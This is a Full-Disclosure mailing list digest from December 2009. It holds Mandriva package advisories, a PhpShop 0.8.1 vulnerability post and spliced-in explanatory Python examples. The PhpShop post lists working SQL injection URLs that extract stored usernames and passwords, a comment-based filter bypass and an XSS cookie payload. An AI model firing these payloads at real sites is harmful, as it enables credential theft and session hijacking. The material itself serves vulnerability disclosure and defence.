[Full-disclosure] Flieg wenn du fliegen kannst, lieb wenn du lieben kannst ; fly when you can fly, love when you can love

2009-12-05 Thread Kingcope
"Man sagt die Augen sind der Spiegel meiner Seele,
und deswegen ist es dunkel an dem Ort an dem ich lebe,
in dem kleinen Platz hier drin ist es Herbst,
und an die Wand schreib ich mit Blut einen Vers,
flieg wenn du fliegen kannst, lieb wenn du lieben kannst,
weil du nie kriegst was du kriegen kannst,
dort kommen die Fremden und sie suchen den Größten,
hör auf dein Herz denn du musst wählen zwischen Gutem und Bösen,
Mama, das ist die Nacht in der wir kämpfen und sie zwingen mich dazu,
deswegen hasse ich die Menschen, in diesem harten Leben gibt es keinen
Ort an dem ich frei sein kann, ausser dann im Garten Eden,
ich hab Blasen an den Füssen weil ich Barfuß geh,
wenn ich laufe wein ich Salz denn dieser Pfad tut weh,
ich wünschte Gott gäb mir ein Pflaster damit Wunden heilen,
halte durch denn man muss stark in diesen Stunden sein,
hier nimm meine Hand, bitte bleib bei mir ich verliere mein Verstand,
sie fangen meinen Mut und brechen meinen Widerstand,
denn sie haben Angst weil ich Hoffnung in den Liedern fand."
Bushido

"They say the eyes are the mirror of my soul,
and so it is dark at the place where I live,
In here, in the small space, it's autumn,
and on the wall with blood I write a verse,
fly when you can fly, love when you can love,
because you'll never get what you can get,
there come the foreigners and they look for the greatest,
listen to your heart because you have to choose between good and evil;
Mom, this is the night we fight, and they force me to
that's why I hate the people,
in this hard life, there is no place where I can be free,
except then in the garden of Eden,
I have blisters on my feet because I go barefoot,
I am crying salt when I walk this path because it hurts,
I wish to God I'd give a patch to heal wounds,
hold through because you have to be strong in these hours,
Here take my hand, please stay with me I lose my mind
they catch my courage and break my resistance,
because they are afraid because I found hope in the songs."

Bushido

http://www.youtube.com/watch?v=rsBeZgaUG2I


xpl.pl
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2009:319 ] xine-lib

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:319
 http://www.mandriva.com/security/
 ___

 Package : xine-lib
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Vulnerabilities have been discovered and corrected in xine-lib:
 
 Failure on Ogg files manipulation can lead remote attackers to cause
 a denial of service by using crafted files (CVE-2008-3231).
 
 Failure on manipulation of either MNG or Real or MOD files can lead
 remote attackers to cause a denial of service by using crafted files
 (CVE: CVE-2008-5233).
 
 Heap-based overflow allows remote attackers to execute arbitrary
 code by using Quicktime media files holding crafted metadata
 (CVE-2008-5234).
 
 Heap-based overflow allows remote attackers to execute arbitrary code
 by using either crafted Matroska or Real media files (CVE-2008-5236).
 
 Failure on manipulation of either MNG or Quicktime files can lead
 remote attackers to cause a denial of service by using crafted files
 (CVE-2008-5237).
 
 Multiple heap-based overflows on input plugins (http, net, smb, dvd,
 dvb, rtsp, rtp, pvr, pnm, file, gnome_vfs, mms) allow attackers to
 execute arbitrary code by handling those input channels. Further
 this problem can even lead attackers to cause denial of service
 (CVE-2008-5239).
 
 Heap-based overflow allows attackers to execute arbitrary code by using
 crafted Matroska media files (MATROSKA_ID_TR_CODECPRIVATE track entry
 element). Further a failure on handling of Real media files (CONT_TAG
 header) can lead to a denial of service attack (CVE-2008-5240).
 
 Integer underflow allows remote attackers to cause denial of service
 by using Quicktime media files (CVE-2008-5241).
 
 Failure on manipulation of Real media files can lead remote attackers
 to cause a denial of service by indexing an allocated buffer with a
 certain input value in a crafted file (CVE-2008-5243).
 
 Vulnerabilities of unknown impact - possibly buffer overflow - caused
 by a condition of video frame preallocation before ascertaining the
 required length in V4L video input plugin (CVE-2008-5245).
 
 Heap-based overflow allows remote attackers to execute arbitrary
 code by using crafted media files. This vulnerability is in the
 manipulation of ID3 audio file data tagging mainly used in MP3 file
 formats (CVE-2008-5246).
 
 Integer overflow in the qt_error parse_trak_atom function in
 demuxers/demux_qt.c in xine-lib 1.1.16.2 and earlier allows remote
 attackers to execute arbitrary code via a Quicktime movie file with a
 large count value in an STTS atom, which triggers a heap-based buffer
 overflow (CVE-2009-1274)
 
 Integer overflow in the 4xm demuxer (demuxers/demux_4xm.c) in xine-lib
 1.1.16.1 allows remote attackers to cause a denial of service (crash)
 and possibly execute arbitrary code via a 4X movie file with a large
 current_track value, a similar issue to CVE-2009-0385 (CVE-2009-0698)
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 This update fixes these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3231
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5233
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5234
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5236
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5237
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5239
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5240
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5241
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5243
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5245
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5246
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0698
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1274
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 4af13839ca34edcc90fae3c6940005c6  
2008.0/i586/libxine1-1.1.8-4.8mdv2008.0.i586.rpm
 777f8b97c3d64e5882f0f85be5e1340d  
2008.0/i586/libxine-devel-1.1.8-4.8mdv2008.0.i586.rpm
 10c7ee6edeb280551e17d0376720f852  
2008.0/i586/xine-aa-1.1.8-4.8mdv2008.0.i586.rpm
 c5607eac6e8378d98f4e27bc0417abbc  
2008.0/i586/xine-caca-1.1.8-4.8mdv2008.0.i586.rpm
 596d607e9ee75a77b9ec18cee9b3c192  
2008.0/i586/xine-dxr3-1.1.8-4.8mdv2008.0.i586.rpm
 f1c30f1f9288c44a8c6d05e7dc4324c1  
2008.0/i586/xine-esd-1.1.8-4.8mdv2008.0.i586.rpm
 a3b810d75a71c5ac618b1de045baf5fc  
2008.0/i586/xine-flac-1.1.8-4.8mdv2008.0.i586.rpm
 629c357b6bcc09ceadb05cf8ea9b05a5  
2008.0/i586/xine-gnomevfs-1.1.8-4.8mdv2008.0.i586.rpm

[Full-disclosure] [ MDVSA-2009:297-1 ] ffmpeg

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:297-1
 http://www.mandriva.com/security/
 ___

 Package : ffmpeg
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Vulnerabilities have been discovered and corrected in ffmpeg:
 
 - The ffmpeg lavf demuxer allows user-assisted attackers to cause
 a denial of service (application crash) via a crafted GIF file
 (CVE-2008-3230)
 
 - FFmpeg 0.4.9, as used by MPlayer, allows context-dependent attackers
 to cause a denial of service (memory consumption) via unknown vectors,
 aka a Tcp/udp memory leak. (CVE-2008-4869)
 
 - Integer signedness error in the fourxm_read_header function in
 libavformat/4xm.c in FFmpeg before revision 16846 allows remote
 attackers to execute arbitrary code via a malformed 4X movie file with
 a large current_track value, which triggers a NULL pointer dereference
 (CVE-2009-0385)
 
 The updated packages fix this issue.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3230
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4869
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0385
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 10da9fc12452c7cde9ce292ea53caf10  
2008.0/i586/ffmpeg-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm
 445a770a40e9dc01a10b6d359671b1af  
2008.0/i586/libavformats51-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm
 a91631838f07bc4bb426324ecb8fb4b2  
2008.0/i586/libavutil49-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm
 985ed365e67adf02d7c53ad234eb3671  
2008.0/i586/libffmpeg51-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm
 6e8c5464b517a27fd81e9bf96d2d3476  
2008.0/i586/libffmpeg51-devel-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm
 1ed84a832c2d512d8295e79b8f60b5cf  
2008.0/i586/libffmpeg51-static-devel-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm 
 9cf052b2ccca2dea0bc80dcef6736108  
2008.0/SRPMS/ffmpeg-0.4.9-3.pre1.8994.2.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 4395e487eab704996b16cd1f8e8b8827  
2008.0/x86_64/ffmpeg-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm
 60f8a5659dc02de6cf2281e13560277e  
2008.0/x86_64/lib64avformats51-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm
 6fe00332a7f3f0006859b0f321422c7d  
2008.0/x86_64/lib64avutil49-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm
 c7c81b80917163dfee22fa9986fa112e  
2008.0/x86_64/lib64ffmpeg51-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm
 4aad12d06a19aa84a9b07e412e2a5eab  
2008.0/x86_64/lib64ffmpeg51-devel-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm
 c58315cfa21917e6b6385ad87ef01671  
2008.0/x86_64/lib64ffmpeg51-static-devel-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm
 
 9cf052b2ccca2dea0bc80dcef6736108  
2008.0/SRPMS/ffmpeg-0.4.9-3.pre1.8994.2.3mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  


[Full-disclosure] PhpShop Multiple Vulnerabilities

2009-12-05 Thread Andrea Fabrizi
**
Application: PhpShop
Version affected:  0.8.1
Website: http://www.phpshop.org/
Discovered By: Andrea Fabrizi
Email: andrea.fabr...@gmail.com
Web: http://www.andreafabrizi.it
Vuln: Multiple Vulnerabilities
**


### SQL INJECTION
http://localhost/phpshop-0.8.1/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
http://localhost/phpshop-0.8.1/?page=shop/flypage&product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
aaa
http://localhost/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1' and
'1'='1
http://localhost/phpshop-0.8.1/?page=admin/module_form&module_id=1' and
'1'='1
http://localhost/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4'
and '1'='1
http://localhost/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6'
and '1'='1
http://localhost/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc'
and '1'='1
http://localhost/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1'
and '1'='1
http://localhost/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2' and '1'='1
...and many others...

The SQL Injection security check can be bypassed replacing spaces with
comments (/**/)

### BLIND SQL INJECTION
http://localhost/phpshop-0.8.1/?page=shop/browse&category=aaa' and 1=1 --
aaa


### CSRF
http://localhost/phpshop-0.8.1/?page=shop/cart&func=cartAdd&product_id=321&;
...and many others...


### XSS
http://localhost/phpshop-0.8.1/?page=order/order_print&order_id=1
">alert(document.cookie);
...and many others...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
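
The post above notes that the application's SQL injection check can be bypassed by replacing spaces with comments. The following is an added example, not part of the original post and not PhpShop code: a hypothetical whitespace-based keyword blacklist next to parameter binding, run against a constructed in-memory SQLite database whose schema and rows are assumptions.

```python
import re
import sqlite3

# Hypothetical blacklist: looks for "union select" separated by whitespace.
BLACKLIST = re.compile(r"union\s+select", re.IGNORECASE)

# Constructed inputs: the same statement, once with spaces and once with
# empty SQL comments where the spaces were.
SPACED = "x' union select password from auth_user--"
COMMENTED = "x'/**/union/**/select/**/password/**/from/**/auth_user--"


def make_db():
    """In-memory database with constructed rows (schema is hypothetical)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE product (product_id TEXT PRIMARY KEY, name TEXT);
        CREATE TABLE auth_user (username TEXT, password TEXT);
        INSERT INTO product VALUES ('1011', 'Widget');
        INSERT INTO auth_user VALUES ('admin', 'constructed-hash');
        """
    )
    return db


def filter_passes(value):
    """True when the blacklist finds nothing to object to."""
    return BLACKLIST.search(value) is None


def lookup_concat(db, product_id):
    """Weak pattern: blacklist check, then string concatenation into SQL."""
    if not filter_passes(product_id):
        raise ValueError("rejected by blacklist")
    sql = "SELECT name FROM product WHERE product_id = '" + product_id + "'"
    return db.execute(sql).fetchall()


def lookup_bound(db, product_id):
    """Corrected pattern: the value is bound as data and never parsed as SQL."""
    sql = "SELECT name FROM product WHERE product_id = ?"
    return db.execute(sql, (product_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("blacklist passes spaced input:   ", filter_passes(SPACED))
    print("blacklist passes commented input:", filter_passes(COMMENTED))
    print("concatenated query returns:      ", lookup_concat(db, COMMENTED))
    print("bound query returns:             ", lookup_bound(db, COMMENTED))
```

With binding in place the blacklist adds nothing, because the driver never interprets the parameter as SQL text.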

[Full-disclosure] [ MDVSA-2009:284-1 ] gd

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:284-1
 http://www.mandriva.com/security/
 ___

 Package : gd
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in gd:
 
 The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the
 GD Graphics Library 2.x, does not properly verify a certain colorsTotal
 structure member, which might allow remote attackers to conduct
 buffer overflow or buffer over-read attacks via a crafted GD file,
 a different vulnerability than CVE-2009-3293.  NOTE: some of these
 details are obtained from third party information (CVE-2009-3546).
 
 This update fixes this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 b770ed57194e79c086e3f0ab177ed97c  
2008.0/i586/gd-utils-2.0.35-1.1mdv2008.0.i586.rpm
 c1d1ed31374dfd08ef28c19a96053c41  
2008.0/i586/libgd2-2.0.35-1.1mdv2008.0.i586.rpm
 42b0f7db12bc7d4b5ba16fb5c1c5ba18  
2008.0/i586/libgd2-devel-2.0.35-1.1mdv2008.0.i586.rpm
 0cdc571626816ba364a0345d4fb1b842  
2008.0/i586/libgd2-static-devel-2.0.35-1.1mdv2008.0.i586.rpm 
 2ffaca3571956e7726a4000a037d629e  2008.0/SRPMS/gd-2.0.35-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 9ec41bc368270fc73cea7ae73be05a82  
2008.0/x86_64/gd-utils-2.0.35-1.1mdv2008.0.x86_64.rpm
 e2e431c378bb7fbf90412f7e76e8620d  
2008.0/x86_64/lib64gd2-2.0.35-1.1mdv2008.0.x86_64.rpm
 200615aafb2b7f3a0a595383308b779d  
2008.0/x86_64/lib64gd2-devel-2.0.35-1.1mdv2008.0.x86_64.rpm
 ca5db470889f17171dcd7c2c73b2045a  
2008.0/x86_64/lib64gd2-static-devel-2.0.35-1.1mdv2008.0.x86_64.rpm 
 2ffaca3571956e7726a4000a037d629e  2008.0/SRPMS/gd-2.0.35-1.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  


[Full-disclosure] [ MDVSA-2009:252-1 ] perl-IO-Socket-SSL

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:252-1
 http://www.mandriva.com/security/
 ___

 Package : perl-IO-Socket-SSL
 Date: December 5, 2009
 Affected: 2009.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in perl-IO-Socket-SSL:
 
 The verify_hostname_of_cert function in the certificate checking
 feature in IO-Socket-SSL (IO::Socket::SSL) 1.14 through 1.25 only
 matches the prefix of a hostname when no wildcard is used, which
 allows remote attackers to bypass the hostname check for a certificate
 (CVE-2009-3024).
 
 This update provides a fix for this vulnerability.

 Update:

 Packages were missing for 2009.0, this update addresses the problem.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3024
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 7e37ff49f7a218b12b4635a0fb061c8e  
2009.0/i586/perl-IO-Socket-SSL-1.15-1.2mdv2009.0.noarch.rpm 
 ffe8c1ead458cc0c011258f57d4908bf  
2009.0/SRPMS/perl-IO-Socket-SSL-1.15-1.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 4297e01f0dc3ee3d86c95b8fe09b07f5  
2009.0/x86_64/perl-IO-Socket-SSL-1.15-1.2mdv2009.0.noarch.rpm 
 ffe8c1ead458cc0c011258f57d4908bf  
2009.0/SRPMS/perl-IO-Socket-SSL-1.15-1.2mdv2009.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
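
The advisory above describes a hostname check that compares only a prefix when the certificate name has no wildcard. The following is an added example, not IO::Socket::SSL code and not part of the advisory: it models the flaw as "the requested hostname only has to begin with the certificate name" (an assumption about the direction of the comparison) and sets it beside a label-by-label match. All names are constructed.

```python
def _labels(name):
    """Lower-case a DNS name, drop one trailing dot, split into labels."""
    return name.lower().rstrip(".").split(".")


def strict_match(cert_name, hostname):
    """Whole-name comparison; '*' is accepted only as the entire leftmost label."""
    cert, host = _labels(cert_name), _labels(hostname)
    if len(cert) != len(host) or "" in cert or "" in host:
        return False
    if any("*" in label for label in cert[1:]):
        return False  # wildcard anywhere but the leftmost label
    if cert[0] == "*":
        # require at least two fixed labels so "*.org" style names never match
        return len(cert) >= 3 and cert[1:] == host[1:]
    if "*" in cert[0]:
        return False  # partial-label wildcards are not supported here
    return cert == host


def prefix_match(cert_name, hostname):
    """Flawed behaviour as modelled here: non-wildcard names match by prefix."""
    if "*" in cert_name:
        return strict_match(cert_name, hostname)
    return hostname.lower().startswith(cert_name.lower())


def disagreements(cert_names, hostname):
    """Certificate names the prefix check accepts but the strict check rejects."""
    return [
        name
        for name in cert_names
        if prefix_match(name, hostname) and not strict_match(name, hostname)
    ]


# Constructed certificate names for a regression test of a hostname verifier.
SAMPLE_CERT_NAMES = [
    "www.example.org",    # exact name
    "www.exam",           # truncated name, a prefix of the hostname
    "www",                # single label, also a prefix
    "*.example.org",      # valid wildcard
    "mail.example.org",   # unrelated host
]

if __name__ == "__main__":
    host = "www.example.org"
    for name in SAMPLE_CERT_NAMES:
        print(f"{name:18} prefix={prefix_match(name, host)!s:5} "
              f"strict={strict_match(name, host)}")
    print("accepted only by the prefix check:", disagreements(SAMPLE_CERT_NAMES, host))
```

The `disagreements` list is the useful regression input: a verifier that accepts any of those names for the given host still has the prefix behaviour.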


[Full-disclosure] [ MDVSA-2009:272-1 ] libmikmod

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:272-1
 http://www.mandriva.com/security/
 ___

 Package : libmikmod
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in libmikmod:
 
 libmikmod 3.1.9 through 3.2.0, as used by MikMod, SDL-mixer, and
 possibly other products, relies on the channel count of the last
 loaded song, rather than the currently playing song, for certain
 playback calculations, which allows user-assisted attackers to cause
 a denial of service (application crash) by loading multiple songs
 (aka MOD files) with different numbers of channels (CVE-2007-6720).
 
 libmikmod 3.1.11 through 3.2.0, as used by MikMod and possibly other
 products, allows user-assisted attackers to cause a denial of service
 (application crash) by loading an XM file (CVE-2009-0179).
 
 This update fixes these vulnerabilities.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6720
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0179
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 3a471dfbdeb20ddc7690fb7989c3a128  
2008.0/i586/libmikmod2-3.1.11a-8.1mdv2008.0.i586.rpm
 208ec4e453c86fc86d465747ec77e76e  
2008.0/i586/libmikmod-devel-3.1.11a-8.1mdv2008.0.i586.rpm 
 11b8cbef0a3ae2be83e34f6559ebb769  
2008.0/SRPMS/libmikmod-3.1.11a-8.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 1b9a2ff2c7f0d01782f78b4dd1246bff  
2008.0/x86_64/lib64mikmod2-3.1.11a-8.1mdv2008.0.x86_64.rpm
 b87cfa37b6f63c0cc1bb7988185d181d  
2008.0/x86_64/lib64mikmod-devel-3.1.11a-8.1mdv2008.0.x86_64.rpm 
 11b8cbef0a3ae2be83e34f6559ebb769  
2008.0/SRPMS/libmikmod-3.1.11a-8.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  


[Full-disclosure] [ MDVSA-2009:318 ] xmlsec1

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:318
 http://www.mandriva.com/security/
 ___

 Package : xmlsec1
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple security vulnerabilities have been identified and fixed
 in xmlsec1:
 
 A missing check for the recommended minimum length of the truncated
 form of HMAC-based XML signatures was found in xmlsec1 prior to
 1.2.12. An attacker could use this flaw to create a specially-crafted
 XML file that forges an XML signature, allowing the attacker to
 bypass authentication that is based on the XML Signature specification
 (CVE-2009-0217).
 
 All versions of libtool prior to 2.2.6b suffer from a local
 privilege escalation vulnerability that could be exploited under
 certain conditions to load arbitrary code (CVE-2009-3736).
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 This update fixes this vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0217
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736
 http://www.kb.cert.org/vuls/id/466161
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 b74d614ed793451440ea18c7aab434ee  
2008.0/i586/libxmlsec1-1-1.2.10-5.1mdv2008.0.i586.rpm
 34cc1274710d3c2013ff4c1222d0349d  
2008.0/i586/libxmlsec1-devel-1.2.10-5.1mdv2008.0.i586.rpm
 88b378d43d3ba44bad7d47c1eb5d6c5c  
2008.0/i586/libxmlsec1-gnutls1-1.2.10-5.1mdv2008.0.i586.rpm
 7c7e766ab3886c57d1519b83b4b06af8  
2008.0/i586/libxmlsec1-gnutls-devel-1.2.10-5.1mdv2008.0.i586.rpm
 712c732bc8ff6050fdc6dd108623e63a  
2008.0/i586/libxmlsec1-nss1-1.2.10-5.1mdv2008.0.i586.rpm
 bed9636e852f4c90cd9a5891fb9395ea  
2008.0/i586/libxmlsec1-nss-devel-1.2.10-5.1mdv2008.0.i586.rpm
 3e6940d49ffc024240b7116250d1f770  
2008.0/i586/libxmlsec1-openssl1-1.2.10-5.1mdv2008.0.i586.rpm
 cb8d177f72966ff06a9a1e08f8c48dbe  
2008.0/i586/libxmlsec1-openssl-devel-1.2.10-5.1mdv2008.0.i586.rpm
 38ae0ed435d6e5133530d5af4a33883a  
2008.0/i586/xmlsec1-1.2.10-5.1mdv2008.0.i586.rpm 
 bf47e5312113b150bdcce2634254b555  
2008.0/SRPMS/xmlsec1-1.2.10-5.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 2f16be60c636cc6d286258b7d331f52b  
2008.0/x86_64/lib64xmlsec1-1-1.2.10-5.1mdv2008.0.x86_64.rpm
 dcbfa0192a2a1ed72d9b4f7fc4c31c7f  
2008.0/x86_64/lib64xmlsec1-devel-1.2.10-5.1mdv2008.0.x86_64.rpm
 b7d5a923126d4ab43b9c9868aed26803  
2008.0/x86_64/lib64xmlsec1-gnutls1-1.2.10-5.1mdv2008.0.x86_64.rpm
 041a56825a59f497dce1085bc0fcf717  
2008.0/x86_64/lib64xmlsec1-gnutls-devel-1.2.10-5.1mdv2008.0.x86_64.rpm
 5f70fda9524faee1b86e14e7b092e426  
2008.0/x86_64/lib64xmlsec1-nss1-1.2.10-5.1mdv2008.0.x86_64.rpm
 63c4b923f7cf4bb46e06d966a880ef6c  
2008.0/x86_64/lib64xmlsec1-nss-devel-1.2.10-5.1mdv2008.0.x86_64.rpm
 62174f73e2d333da65befa79cd85c1ad  
2008.0/x86_64/lib64xmlsec1-openssl1-1.2.10-5.1mdv2008.0.x86_64.rpm
 6439cacc0520e43b8280758a4a91b042  
2008.0/x86_64/lib64xmlsec1-openssl-devel-1.2.10-5.1mdv2008.0.x86_64.rpm
 e4db63bda5a32757a17be8d4dcd31639  
2008.0/x86_64/xmlsec1-1.2.10-5.1mdv2008.0.x86_64.rpm 
 bf47e5312113b150bdcce2634254b555  
2008.0/SRPMS/xmlsec1-1.2.10-5.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
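
The advisory above concerns a missing minimum-length check on truncated HMAC values in XML signatures (CVE-2009-0217). The following is an added example, not xmlsec1 code and not part of the advisory: a verifier that trusts the truncation length carried in the document, beside one that enforces the XML Signature minimum (the larger of 80 bits and half the hash output). Function names, key and data are constructed for the illustration.

```python
import hashlib
import hmac

MIN_BITS_FLOOR = 80  # lower bound required by the XML Signature specification


def sign(key, data, digest_name="sha1"):
    """Full-length HMAC over the canonicalized data."""
    return hmac.new(key, data, digest_name).digest()


def min_output_bits(digest_name):
    """Smallest acceptable truncation: max(80 bits, half the hash output)."""
    hash_bits = hashlib.new(digest_name).digest_size * 8
    return max(MIN_BITS_FLOOR, hash_bits // 2)


def verify_unchecked(key, data, sig_value, output_bits, digest_name="sha1"):
    """Missing-check behaviour: the document-supplied length is used as is."""
    full = sign(key, data, digest_name)
    n = output_bits // 8
    # With output_bits == 0 both slices are empty and compare equal.
    return hmac.compare_digest(full[:n], sig_value[:n])


def verify_checked(key, data, sig_value, output_bits=None, digest_name="sha1"):
    """Corrected behaviour: reject lengths below the minimum before comparing."""
    full = sign(key, data, digest_name)
    full_bits = len(full) * 8
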